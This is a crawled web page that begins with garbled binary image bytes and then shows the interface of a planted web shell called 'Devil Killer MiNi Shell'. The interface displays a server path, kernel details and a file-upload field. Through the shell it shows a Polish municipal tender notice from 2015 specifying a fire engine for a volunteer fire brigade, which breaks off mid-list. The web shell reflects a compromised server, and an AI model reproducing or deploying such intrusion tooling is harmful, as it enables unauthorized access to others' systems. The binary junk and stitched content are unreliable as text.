JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150805/117083-N-2015.html

<p class="kh_header"><b>Opatówek: Zakup średniego samochodu pożarniczego dla realizacji zadań w zakresie ochrony przeciwpożarowej na terenie gminy Opatówek dla OSP Tłokinia Wielka</b><br>
<b>Numer ogłoszenia: 117083 - 2015; data zamieszczenia: 05.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Opatówek , ul. Plac  Wolności 14, 62-860 Opatówek, woj. wielkopolskie, tel. 062 7618080, 7618454,, faks 062 7618017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opatowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup średniego samochodu pożarniczego dla realizacji zadań w zakresie ochrony przeciwpożarowej na terenie gminy Opatówek dla OSP Tłokinia Wielka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA
Zakup średniego samochodu pożarniczego dla realizacji zadań w zakresie ochrony przeciwpożarowej na terenie gminy Opatówek przez OSP Tłokinia Wielka. 

Dostawa 1 sztuki średniego samochodu pożarniczego, ratowniczo gaśniczego na podwoziu z napędem uterenowionym 4x4 o właściwościach podanych niżej. 

I. WYMAGANIA PODSTAWOWE.
1.1. Pojazd powinien spełniać wymagania polskich przepisów o ruchu drogowym zgodnie z Ustawą Prawo o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych.
1.2. Pojazd powinien spełniać przepisy Polskiej Normy PN-EN 1846-1 oraz PN-EN 1846-2 lub równoważne.
1.3. Pojazd powinien spełniać minimalne Wymagania techniczno-użytkowe dla wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, wprowadzanych do użytkowania w jednostkach ochrony przeciwpożarowej, Rozporządzenie Ministra Spraw Wewnętrznych Administracji -Dz.U. Nr 143 poz. 1002 z 2007 r, i Rozporządzenie zmieniające - Dz.U. Nr 85 poz 553 z 2010 r.
1.4. Samochód musi posiadać świadectwo dopuszczenia wyrobu, do stosowania w jednostkach ochrony przeciwpożarowej wydany przez polską jednostkę certyfikującą.
1.5. Oferowany samochód ratowniczo-gaśniczy, przed dostawą musi mieć wykonany stosowny przegląd techniczny potwierdzony stosownym zaświadczeniem właściwej stacji diagnostycznej, być pełnosprawny i gotowy do natychmiastowego użycia - w przypadku importu samochód ratowniczo-gaśniczy powinien być oclony i gotowy do zarejestrowania w dniu dostawy.
II. PODWOZIE Z KABINĄ.
2.1. Maksymalna masa rzeczywista samochodu gotowego do akcji ratowniczo-gaśniczej (pojazd z załogą, pełnymi zbiornikami, zabudową i wyposażeniem)- nie może przekroczyć 16 000kg.
2.2. Samochód wyposażony w silnik wysokoprężny o mocy min.205 kW. 
2.3. Samochód fabrycznie nowy, rok produkcji podwozia: najwcześniej 2014r lub 2015 r. 
2.4. Samochód wyposażony w podwozie drogowe w układzie napędowym 4x4 - uterenowiony z:
- przekładnią rozdzielczą z możliwością wyboru przełożeń szosowych i trenowych,
- blokadą mechanizmu różnicowego osi tylnej, przedniej oraz międzyosiowego,
- napęd stały osi przedniej,
- na osi przedniej koła pojedyncze, na osi tylnej koła podwójne,
- skrzynia biegów-manualna min 6 biegowa plus wsteczny, 
- system ABS- z możliwością odłączenia podczas jazdy w terenie - sposób odłączania w gestii Wykonawcy, 
- światła do jazdy dziennej uruchamiane po przekręceniu kluczyka, 
2.5. Samochód wyposażony w silnik o zapłonie samoczynnym, posiadający aktualne normy ochrony środowiska (czystości spalin) spełniający normę emisji spalin- min. Euro 6.
2.6. Zawieszenie osi przedniej i tylnej:
- mechaniczne- resory paraboliczne,
- amortyzatory teleskopowe,
- stabilizator przechyłów. 
2.7. Zabudowa podłączona do podwozia poprzez system informatycznej komunikacji sterujący podzespołami na samochodzie (podwozie i nadwozie pojazdu) z pełną kontrolą sygnału (sygnał wysyłany i potwierdzony jego odbiór) z funkcją lokalizacji uszkodzeń lub niesprawności głównych elementów instalacji.
2.8. Kabina fabrycznie jednomodułowa czterodrzwiowa, zapewniająca dostęp do silnika, w układzie miejsc 1+1+4 (siedzenia przodem do kierunku jazdy).
Kabina wyposażona w:
- klimatyzację,
- indywidualne oświetlenie do czytania mapy dla pozycji dowódcy,
- niezależny układ ogrzewania, umożliwiający ogrzewanie kabiny przy wyłączonym silniku,
- zewnętrzną osłonę przeciwsłoneczną z przodu dachu kabiny,
- elektrycznie sterowane szyby po stronie kierowcy i dowódcy,
- elektrycznie sterowane lusterka po stronie kierowcy i dowódcy,
- lusterka zewnętrzne, elektrycznie podgrzewane (główne i szerokokątne),
- lusterko rampowe - krawężnikowe z prawej strony, lusterko rampowe - dojazdowe, przednie,
- poręcz do trzymania w tylnej części kabiny,
- wywietrznik dachowy,
Kabina wyposażona dodatkowo w:
- uchwyty na 4 aparaty powietrzne z butlami kompozytowymi, umieszczone w oparciach tylnych siedzeń (uchwyty na aparaty nie powinny w żadnym stopniu zmniejszać przestrzeni załogi i ograniczać powierzchni siedziska),
- odblokowanie każdego aparatu indywidualnie, dźwignia odblokowująca o konstrukcji uniemożliwiającej przypadkowe odblokowanie np. w czasie hamowania pojazdu, w przypadku gdy aparaty nie są przewożone, wstawienie oparć w miejscu mocowania aparatów,
- schowek pod siedzeniami w tylnej części kabiny,
- przestrzeń pomiędzy maksymalnie odsuniętym do tyłu fotelem kierowcy a tylną ścianą kabiny minimum 1600mm,
2.9. Fotele wyposażone w bezwładnościowe pasy bezpieczeństwa. Siedzenia pokryte materiałem łatwo zmywalnym, o zwiększonej odporności na ścieranie. Fotele wyposażone w zagłówki.
Fotel dla kierowcy:
- z pneumatyczną regulacją wysokości,
- z regulacją dostosowania do ciężaru ciała, 
- z regulacją odległości całego fotela,
- z regulacją pochylenia oparcia, 
Fotel dla pasażera(dowódcy):
- z mechaniczną regulacją wysokości, 
- z regulacją odległości całego fotela,
- z regulacją pochylenia oparcia,
- zapewniające minimalny, należyty komfort jazdy i optymalną pozycję dla kierowcy i pasażera..
2.10. W kabinie kierowcy zamontowane następujące urządzenia:
- radiotelefon samochodowy cyfrowo analogowy przystosowany do pracy pasmo częstotliwości 136-174MHz i odstępie międzykanałowym min 12,5kHz i 6,25 kHz w trybie cyfrowym. Moc wyjściowa nadajnika w całym zakresie częstotliwości od 1W-25W. Radiotelefon kompatybilny do pracy w łączności stosowanej w KMPSP Kalisz.
- radio z odtwarzaczem, 
- podest do ładowarek radiostacji przenośnych i latarek z wyłącznikiem,
- 2szt radiostacji przenośnych z ładowarkami,
- 2szt latarek kątowych typu Ex z ładowarkami.
2.11. W kabinie kierowcy zabudowany panel informacyjny o przekątnej min 10 cali z systemem informacyjno-sterującym, dostępny dla kierowcy i dowódcy, wyposażony w zestaw podświetlanych włączników oraz ekran o przekątnej min.7 cali. Panel z aprobatą techniczną do zastosowań mobilnych. Panel wyposażony w funkcje, minimum:
1.Sterujące:
- oświetleniem zewnętrznym,
- masztem oświetleniowym (kąt pochyłu i obrotu najaśnic),
- jasnością obrazu ekranu,
2.Informacyjne:
- aktualne ilości środków gaśniczych w zbiornikach,
- aktualne wartości ciśnień w układzie niskiego i wysokiego ciśnienia autopompy,
- o załączonej autopompie,
- o otwartych i zamkniętych poszczególnych żaluzjach z alarmem świetlnym i dźwiękowym,
- o otwarciu i zamknięciu poszczególnych podestów z alarmem świetlnym i dźwiękowym,
- o sygnalizacji załączonego gniazda ładowania i stanu naładowania akumulatorów,
- o załączonym oświetleniu zewnętrznym i wewnętrznym,
- o aktualnym wartości napięcia w instalacji elektrycznej,
- informacja o wysunięciu masztu alarmem świetlnym i dźwiękowym,
- kontrolka włączenia autopompy,
- graficznych oraz numerycznych wartościach ustawienia kąta pochyłu i obrotu najaśnic masztu oświetleniowego względem pojazdu,
- raport z akcji z wyszczególnieniem takich informacji jak:
- ostatnie załączenie autopompy - data/godzina,
- ilość zużytego paliwa,
- ilość zużytych zasobów wody i środka pianotwórczego,
- sumaryczne zestawienie czasu pracy autopompy, 
- sumaryczne zestawienie ilości zużytych środków gaśniczych,
- historia załączeń autopompy, zużycia środków gaśniczych, 
- minimum 50 pozycji wstecznych,
Dodatkowe urządzenia zamontowane w kabinie:
- sterowanie niezależnym ogrzewaniem kabiny i przedziału pracy autopompy,
- przycisk załączający sygnał pneumatyczny, ostrzegawczy, dźwiękowy,
- pilot do bezprzewodowego sterowania masztem z odległości minimum 50m, 
- główny wyłącznik oświetlenia skrytek,
- sterowanie zraszaczami pojazdu,
- funkcja inklinometr - Kąty pochyłu bocznego i podłużnego w terenie. 
2.12. Pojazd wyposażony w urządzenie sygnalizacyjno - ostrzegawcze (akustyczne i świetlne), pojazdu uprzywilejowanego. Urządzenie akustyczne powinno umożliwiać podawanie komunikatów słownych. Głośnik lub głośniki o mocy min. 200W.
Sterowanie przy pomocy manipulatora na elastycznym przewodzie ,zmiana modulacji dźwiękowej sygnału poprzez klakson pojazdu, manipulator powinien być funkcjonalny, czytelny i posiadać wyraźne, podświetlane oznaczenia trybu pracy w ciągu dnia i nocy.
Wymagana funkcjonalność podstawowa:
- załączenie sygnałów dźwiękowych i świetlnych jednym przyciskiem (pojedyncze krótkie naciśnięcie przycisku),
- wyłączenie sygnałów dźwiękowych(pojedyncze naciśnięcie przycisku),
- wyłączenie sygnałów dźwiękowych, świetlnych (pojedyncze naciśnięcie przycisku). 
Na dachu kabiny zamontowana kompozytowa nadbudowa z zamontowaną, lampą zespolona z napisem STRAŻ z głośnikiem, i dwie wyprofilowane, ukształtowane aerodynamicznie z łagodnie zaokrąglonymi kształtami naroży lampy niebieskie LED, oraz zamontowane dwie lampy dalekosiężne w nadbudowie górnej.
- dodatkowo 2 lampy sygnalizacyjne niebieskie LED z przodu pojazdu, 
- na ścianie tylnej pojazdu, w narożach wyprofilowane dwie lampy niebieskie ukształtowane aerodynamicznie z łagodnie zaokrąglonymi kształtami naroży, 
- oraz fala świetlna LED umieszczona na tylnej ścianie nadwozia, 
- na ścianie dolnej tylnej nadwozia z lewej i prawej strony zamontowane dwie lampy zespolone tylne z zabezpieczeniami ochronnymi ,
2.13. Instalacja elektryczna wyposażona w główny wyłącznik prądu.
2.14. Pojazd wyposażony w zintegrowany układ z wyrzutnikiem do ładowania akumulatorów z zewnętrznego źródła -230V, podłączenie zblokowane w jednym gnieździe przyłączeniowym ze złączem do uzupełniania powietrza w układzie pneumatycznym z sieci stacjonarnej, z wtyczką i przewodem o długości min 4m, umieszczonym po lewej stronie. Złącze musi być samo rozłączalne w momencie rozruchu silnika. Ładowarka-prostownik zamontowana na samochodzie. W kabinie kierowcy sygnalizacja wizualna i dźwiękowa podłączenia instalacji do zewnętrznego źródła.
2.15. Pojazd wyposażony w sygnalizację świetlną i dźwiękową włączonego biegu wstecznego (jako sygnalizację świetlną dopuszcza się światło cofania).
2.16. Pojazd wyposażony w sygnał pneumatyczny, włączany dodatkowym włącznikiem z miejsca dostępnego dla kierowcy i dowódcy.
2.17 Pojazd wyposażony w hak holowniczy, szczękowy przystosowany do ciągnięcia przyczep, zgodnie z homologacją podwozia, o masie min. 10 ton Złącza elektryczne i pneumatyczne muszą współpracować z przyczepą.
2.18. Ogumienie uniwersalne, szosowo-terenowe z bieżnikiem dostosowanym do różnych warunków atmosferycznych. Pełnowymiarowe koło zapasowe na wyposażeniu pojazdu-dopuszcza się brak stałego mocowania w pojeździe.
2.19. Kolory samochodu:
- elementy podwozia, rama - w kolorze czarnym lub zbliżonym, 
- błotniki i zderzaki - w kolorze białym,
- żaluzje skrytek - w kolorze naturalnym aluminium,
- kabina, zabudowa - w kolorze czerwonym RAL 3000.
III. ZABUDOWA POŻARNICZA. 
3.1. Maksymalna wysokość całkowita pojazdu-3100 mm-dostosowana do wysokości bramy garażowej.
Konstrukcja i poszycie zewnętrzne, wykonane w całości z materiałów kompozytowych, jako konstrukcja samonośna ze zintegrowanymi zbiornikami o nieograniczonej odporności na korozję.
Wewnętrzne poszycia bocznych skrytek wyłożone anodowaną gładką blachą aluminiową, spody schowków- blachą nierdzewną.
Balustrady ochronne boczne -dachu wykonane ze specjalnych materiałów kompozytowych.
Po trzy skrytki na bokach pojazdu (w układzie 3+3+1).
Pomiędzy kabiną a zabudową pożarniczą zamontowana kompozytowa osłona ochronno-maskująca.
3.2. Wymagane otwierane lub wysuwne podesty pod wszystkimi schowkami bocznymi zabudowy, które umożliwią łatwy i bezpieczny dostęp w czasie akcji ratowniczo-gaśniczej, do sprzętu położonego w górnych partiach schowków, na całej długości zabudowy.
Musi być zainstalowany podest otwierany lub wysuwny nad kołami tylnymi po obu stronach zabudowy. 
Otwarcie i zamknięcie podestów wspomagane systemem teleskopowym. 
3.3. Otwarcie lub wysunięcie podestu, musi być sygnalizowane w kabinie kierowcy. 
Otwierane lub wysuwne podesty poza obrys pojazdu, muszą posiadać oznakowanie ostrzegawcze.
3.4. Skrytki na sprzęt i przedział autopompy wysokociśnieniowej wyposażone w oświetlenie, podwójne listwy- LED, umieszczone pionowo po obu stronach schowka, przy prowadnicy żaluzji, włączane automatycznie po otwarciu drzwi-żaluzji skrytki. W kabinie zamontowana sygnalizacja otwarcia skrytek.
Główny wyłącznik oświetlenia skrytek, zainstalowany w kabinie kierowcy.
3.5. Pojazd posiada oświetlenie pola pracy wokół samochodu:
- oświetlenie składające się z lamp bocznych do oświetlenia dalszego pola pracy wbudowane w kompozytowe balustrady boczne (min. 3 szt. na stronę),
- zewnętrznych listew LED, zamontowanych nad żaluzjami, do oświetlenia pola bezpośrednio przy pojeździe bezpieczeństwo obsługi nadwozia wokół samochodu, w czasie akcji ratowniczej,
- oświetlenie powierzchni dachu, lampami typu LED,
- oświetlenia włączane z przedziału autopompy,
- w kabinie musi być zainstalowany włącznik do załączenia oświetlenia zewnętrznego, z możliwością sterowania oświetleniem z tablicy autopompy,
- z tyłu pojazdu w dolnej części po obu stronach pojazdu zamontowane obrysówki LED widoczne w lusterkach wstecznych kierowcy.
3.6.  Szuflady i wysuwane tace automatycznie ,blokują się w pozycji wsuniętej i całkowicie wysuniętej i posiadają zabezpieczenie przed całkowitym wyciągnięciem.
Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys pojazdu, posiadają oznakowanie ostrzegawcze
3.7. Półki sprzętowe wykonane z aluminium, w systemie z możliwością regulacji położenia (ustawienia) wysokości półek-w zależności od potrzeb użytkownika.
3.8. Schowki wyposażone w regały, palety wysuwne lub obrotowe: na urządzenie ratownicze, agregat prądotwórczy, sprzęt ratowniczy, w zależności od potrzeb i możliwości zamontowania danego sprzętu .
3.9. Skrytki na sprzęt i wyposażenie zamykane żaluzjami aluminiowymi Drzwi żaluzjowe wyposażone w zamki, jeden klucz pasuje do wszystkich zamków. Wymagane dodatkowe zabezpieczenie przed otwarciem żaluzji.-typu rurkowego.
3.10. Dach zabudowy wykonany w formie podestu roboczego w wykonaniu antypoślizgowym .Balustrada ochronna boczna -dachu wykonana z materiałów kompozytowych jako część z nadbudową pożarniczą z elementami barierki rurowej, o wysokości min 180 mm. 
3.11. Na dachu pojazdu zamontowana zamykana skrzynia aluminiowa na drobny sprzęt o wymiarach minimalnych 1400x460x270 mm, posiadająca oświetlenie wewnętrzne typu LED ,oraz uchwyty z rolkami na drabinę trzyprzęsłową wysuwną z podporami, drabinę dostarcza wykonawca ,uchwyty na węże ssawne, bosak, mostki przejazdowe, tłumice, itp.
3.12. Pojazd posiada drabinkę do wejścia na dach z tyłu samochodu ,wykonana z materiałów nierdzewnych, umieszczoną po prawej stronie .W górnej części drabinki zamontowane poręcze ułatwiające wchodzenie. 
3.13. Powierzchnie platform, podestów roboczych i podłogi kabiny w wykonaniu antypoślizgowym.
3.14. Zbiornik wody o pojemności min. 3,5 m3, wykonany z materiałów kompozytowych.
Zbiornik wyposażony w oprzyrządowanie umożliwiające jego bezpieczną eksploatację, z układem zabezpieczającym przed swobodnym wypływem wody w czasie jazdy.
Zbiornik wyposażony w falochrony i właz rewizyjny.
3.15. Zbiornik wody wyposażony w nasadę 75 umiejscowioną na prawym boku z tyłu pojazdu z zaworem kulowym w zamykanym schowku.
Wlot do napełniania z hydrantu wyposażony w zawór odcinający oraz sito.
Zbiornik wyposażony w urządzenie przelewowe zabezpieczające przed uszkodzeniem podczas napełniania.
Układ zbiornika wyposażony w automatyczny zawór napełniania hydrantowego zabezpieczającego przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną.
3.16. Zbiornik środka pianotwórczego, wykonany z materiałów kompozytowych, odpornych na działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów o pojemności min.10% pojemności zbiornika wodnego.
Napełnianie zbiornika środkiem pianotwórczym, możliwe z poziomu terenu i z dachu pojazdu.
3.17. Układ wodno-pianowy wyposażony w ręczny lub automatyczny dozownik środka pianotwórczego dostosowany do wydajności autopompy, zapewniający uzyskiwanie co najmniej stężeń 3% i 6% (tolerancja +0,5%) w całym zakresie pracy. 
3.18. Autopompa zlokalizowana z tyłu pojazdu w obudowanym przedziale, zamykanym drzwiami żaluzjowymi .
Autopompa dwuzakresowa ze stopniem wysokiego ciśnienia.
- wydajność, min.2400 l/min, przy ciśnieniu 8 bar i głębokości ssania 1,5m,
- wydajność stopnia wysokiego ciśnienia, min. 400 l/min przy ciśnieniu 40 bar, 
3.19. Autopompa umożliwia podanie wody i wodnego roztworu środka pianotwórczego do minimum:
- dwóch nasad tłocznych 75 zlokalizowanych z tyłu pojazdu, po bokach, w zamykanych schowkach,
- wysokociśnieniowej linii szybkiego natarcia,
- działka wodno-pianowego, 
- zraszaczy, 
Autopompa umożliwia podanie wody do zbiornika samochodu.
Autopompa wyposażona w urządzenie odpowietrzające umożliwiające zassanie wody:
- z głębokości 1,5 m w czasie do 30 sek,.
- z głębokości 7,5 m w czasie do 60 sek.
Autopompa wyposażona w układ utrzymywania stałego ciśnienia tłoczenia, umożliwiający sterowanie z regulacją automatyczną i ręczną ciśnienia pracy.
3.20. Na wlocie ssawnym autopompy, zamontowany element zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i ze zbiornika własnego pojazdu, gwarantujący bezpieczną eksploatację pompy.
3.21. Wszystkie elementy układu wodno-pianowego, odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów:
- wszystkie nasady zewnętrzne, w zależności od ich przeznaczenia należy trwale oznaczyć odpowiednimi kolorami:
- nasada woda zasilająca kolor niebieski,
- nasada woda tłoczona kolor czerwony,
- nasada środka pianotwórczego kolor żółty. 
3.22. W przedziale autopompy zainstalowany panel sterujący zawierający co najmniej następujące urządzenia kontrolno-sterownicze z podświetlaniem wskazań:
- praca pompy i urządzeń współpracujących z pompą:
- manometr niskiego ciśnienia,
- manometr wysokiego ciśnienia,
- manowakuometr (podciśnienie),
- wskaźnik poziomu wody w zbiorniku samochodu,
- wskaźnik poziomu środka pianotwórczego w zbiorniku,
- kontrolka ciśnienia oleju i temperatury cieczy chłodzącej silnik,
- sterownik pompy-regulator prędkości obrotowej silnika pojazdu,
- załączenie i wyłączenie autopompy,
- załączenie zaworu głównego,
- załączenie i wyłączenie pompy podciśnienia,
- załączenie i wyłączenie niskiego ciśnienia,
- załączenie i wyłączenie wysokiego ciśnienia,
- załączenie i wyłączenie działka,
- załączenie i wyłączenie tankowania zbiornika wody,
- sterowanie dozownikiem środka pianotwórczego, 
- wyłącznik silnika pojazdu,
- licznik motogodzin-pracy autopompy.
W przedziale autopompy należy zamontować zespół:
- sterowania automatycznym układem utrzymywania stałego ciśnienia tłoczenia, umożliwiający sterowanie z regulacją automatyczną i ręczną ciśnienia pracy,
- sterownia automatycznym zaworem napełniania hydrantowego zabezpieczającym przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną,
-sterowania ręcznym lub automatycznym układem dozowania środka pianotwórczego w całym zakresie pracy autopompy. 
3.23. Przedział pracy autopompy wyposażony w dodatkowy zewnętrzny głośnik z mikrofonem, połączony z radiotelefonem samochodowym.
3.24. Przedział pracy autopompy wyposażony w system ogrzewania działający niezależnie od pracy silnika. Montaż sterowania ogrzewaniem, z kabiny kierowcy.
3.25.  W przedziale pracy autopompy, na tablicy sterującej, wymagane są zamontowane włączniki do uruchamiania silnika pojazdu, załączenia i wyłączenia autopompy oraz wyłączania silnika pojazdu. Włączniki muszą być aktywne przy neutralnej pozycji skrzyni biegów i załączonym ręcznym hamulcu postojowym. 
3.26. Działko wodno-pianowe o regulowanej wydajności, umieszczone na dachu pojazdu z nakładką do piany .Wydajność działka min 800÷1600 l /min, przy podstawie działka zamontowany zawór odcinający. Dopuszcza się zastosowanie zaworu odcinającego ze sterowaniem elektryczno-pneumatycznym. 
3.27. Samochód wyposażony w wysokociśnieniową linię szybkiego natarcia o długości węża min. 60 m umieszczoną na zwijadle, zakończoną prądownicą wodno-pianową o regulowanej wydajności, umożliwiającą podawanie zwartego i rozproszonego strumienia wody oraz piany. Linia szybkiego natarcia umożliwia podawanie wody lub piany z prądownicy bez względu na stopień rozwinięcia węża. Zwijadło wyposażone w napęd elektryczny i ręczny. Szybkie natarcie wyposażone w pneumatyczny system odwadniania, umożliwiający opróżnienie linii przy użyciu sprężonego powietrza.
3.28. Instalacja układu zraszaczy zasilanych od autopompy:
- min 4 dysze do podawania wody w czasie jazdy, 
- dwa zraszacze zamontowane przed przednią osią,
- dwa zraszacze zamontowane po bokach pojazdu.
Instalacja powinna być wyposażona w zawory odcinające (jeden dla zraszaczy przednich, drugi dla zraszaczy bocznych) Montaż sterowania zraszaczami               z kabiny kierowcy.
3.29. Pojazd wyposażony w wysuwany maszt oświetleniowy z głowicą z 2 (dwoma) reflektorami, wyposażonymi w lampy LED o strumieniu świetlnym min. 20 000 lumenów, zasilany z instalacji elektrycznej pojazdu napięciem 24V, wyposażone w soczewki zapewniające szerokie rozproszenie światła. 
- maszt musi posiadać zainstalowane automatyczne przełączanie zasilania z 24V na zasilanie z agregatu prądotwórczego-230V,
- wysokość rozłożonego masztu, mierzona od podłoża do oprawy reflektorów- minimum 5 metrów,
- obrót i pochył reflektorów, o kąt co najmniej od 0 st. do 170 st. - w obie strony,
- sterowanie masztem odbywa się z poziomu ziemi, 
- złożenie masztu następuje, bez konieczności ręcznego wspomagania, 
- w kabinie znajduje się sygnalizacja informująca o wysunięciu masztu, 
- wysunięcie masztu następuje tylko na postoju po zaciągnięciu hamulca ręcznego,
- wymagana funkcja automatycznego złożenia masztu po wyłączeniu hamulca ręcznego,
- wymagana możliwość sterowania masztem na różnej wysokości wysuwu,
- wysuw masztu realizowany z instalacji pneumatycznej samochodu,
- oprócz ręcznego, wymagane jest bezprzewodowe sterowanie masztem (pilotem) obrotem i pochyłem reflektorów oraz załączeniem oświetlenia, dla każdego reflektora osobno (zasięg min 50m).
3.30. Pojazd musi być wyposażony w: 
